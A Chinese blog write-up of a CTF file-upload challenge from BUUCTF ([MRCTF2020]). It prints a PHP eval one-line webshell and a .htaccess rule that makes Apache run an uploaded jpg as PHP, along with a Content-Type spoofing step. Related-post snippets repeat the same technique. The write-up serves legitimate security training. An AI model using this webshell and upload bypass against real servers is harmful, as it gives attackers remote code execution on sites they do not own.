BUUCTF [MRCTF2020]你传你呢1

最新推荐文章于 2023-10-12 20:14:13 发布
最新推荐文章于 2023-10-12 20:14:13 发布
阅读量244 收藏
点赞数
文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73995922/article/details/128332677
版权

进入靶场,看到上传页面

试着上传一句话木马试试

<?php @eval($_POST['cmd']);?>,将文件改为图片格式,jpg或者png

提示我们上传成功,发现使用蚁剑连不上,看了其他大佬的wp发现是文件解析漏洞

.htaccess文件解析漏洞

总结下来的经验就是更改Apache里的.htaccess的配置。可以将其它类型的文件转化为PHP的文件类型。

我们需要写个.htaccess使用php解析器对图片进行解析

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

上传.htaccess文件,这里需要注意

Contenr-Type这里需要修改为image/png

这里看到.htaccess文件上传成功,在使用蚁剑进行连接

 

 拿到flag

知识点:

文件解析漏洞

.htaccess文件使用

 

 

 

XXX_WEB
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF之[MRCTF2020]你你呢 1
qq_44122254的博客
02-10 1955
打开题目靶场,发现是一个上页面 随便上一个文件进行试验一下 发现对此文件有进行过滤 上一个图片进行尝试,发现可以上png图片,制作图片码进行上 图片码内容如下 发现可以上成功但是蚁剑连接的话并不能够连接成功,数据为空 ...
[MRCTF2020]你你呢1
whale_waves的博客
11-05 274
提示这里就不整那么麻烦直接抓包测试首先对后缀测试看过滤了哪些全部被ban了到这里的后续思路通过上一些配置文件把上的图片都以php文件执行尝试上图片码, 直接上成功了, 没有对内容进行过滤到这里思路就清晰了, 按以往的经验, 因该是只做了那几个php的黑名单, 没有限制其他文件, 但是对content-type做了过滤, 只能走图片的类别, 所以上其他文件时需要改为图片的content-type就ok尝试入.htaccess虽然报错说我上了相同的文件但还是成功了。
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
最新发布
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
[MRCTF2020]你你呢 1
shinygod的博客
02-11 2100
知识点:.htaccess和.user.ini的区别 上php,phtml,txt…类型的文件都会被过滤 抓包改content-type也不行 上个jpg格式,里面有一句话木马 路径出来了,我们可以用
BUUCTF——[MRCTF2020]你你呢 1
weixin_45864041的博客
09-28 1264
php文件格式的一句话木马。 上失败。那就先jpg文件 发现上成功。然后我们可以先把路径保存下来。 接下来我们再试一下可不可以通过抓包修改的方式上php文件。 发现上失败。然后,我们又得变换思路了。上一篇文章,我们知道目录下有一个index.php文件,然后我们通过上.user.ini文件让图片被当做php文件解析。接下来我想到一个思路,那就是.htaccess文件。.htaccess文件可以用来留后门和针对黑名单绕过,可以在.htaccess 加入php解析规则,就能够使上的jpg/.
buuctf-web-[MRCTF2020]你你呢1
mlws1900的博客
08-03 901
一个.htaccess文件,先是1.jpg。写一个一句话木马 ,继续上图片马,里面写内容。打开环境, 典型的文件上漏洞利用。可以执行后缀名为jpg的php文件。
BUUCTF之[MRCTF2020]你你呢1
weixin_66294723的博客
10-12 753
很明显是文件上漏洞,通过🐎可知应该是要一个马进去,一开始把自己制作的图片马进去后自己的图片马不行,content-type也没问题后上网找wp发现如果一系列%00,改大小写,图片马之类都不行的话 ,或者上之后 但是菜刀连接不了,回显显示没有数据的话,就代表要改配置文件。
文件上 ---[MRCTF2020]你你呢
yzl_007的博客
08-20 289
[MRCTF2020]你你????呢 进入题目很醒目的打招呼方式 查看源码发现没什么东西 接着上试试,php被静止可以上jpg等图片 想到上.htaccess文件解析jpg马 修改Contnet-Type上成功 文件中 SetHandler application/x-httpd-php 这句话是将任何文件解析成php文件的意思,这个时候就可以上jpg文件马来连接了。 jpg文件能直接上,写下一句话木马然后改后缀直接上即可 如下上成功,然后用蚁剑连接 http://acc07ec
[MRCTF2020]你你呢
pakho_C的博客
02-09 1678
web第26题 [MRCTF2020]你你????呢 打开靶场 应该是一个文件上的题目 首先尝试上普通图片 上成功并且返回路径 上一句话木马尝试 显然做了限制 尝试绕过 看来php3,php5,ptml等都做了限制 尝试图片文件欺骗,这里的后缀是php 依旧失败 尝试上写码后的gif文件 失败。看来对文件内容也做了校验 我又返回去看了一下以前做的upload-labs靶场的绕过 文件上漏洞–upload-labs靶场复现(4-7关) 参考第6关和第7关的思路 尝试使用空格和.绕过
buuctf misc [MRCTF2020]ezmisc 1
05-16
这是一个关于MRCTF2020比赛的misc题目,题目名称为ezmisc 1。不知道你需要什么样的帮助,我可以给你一些关于此题的信息。 题目描述: There are some problems to solve! Each problem corresponds to a flag. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值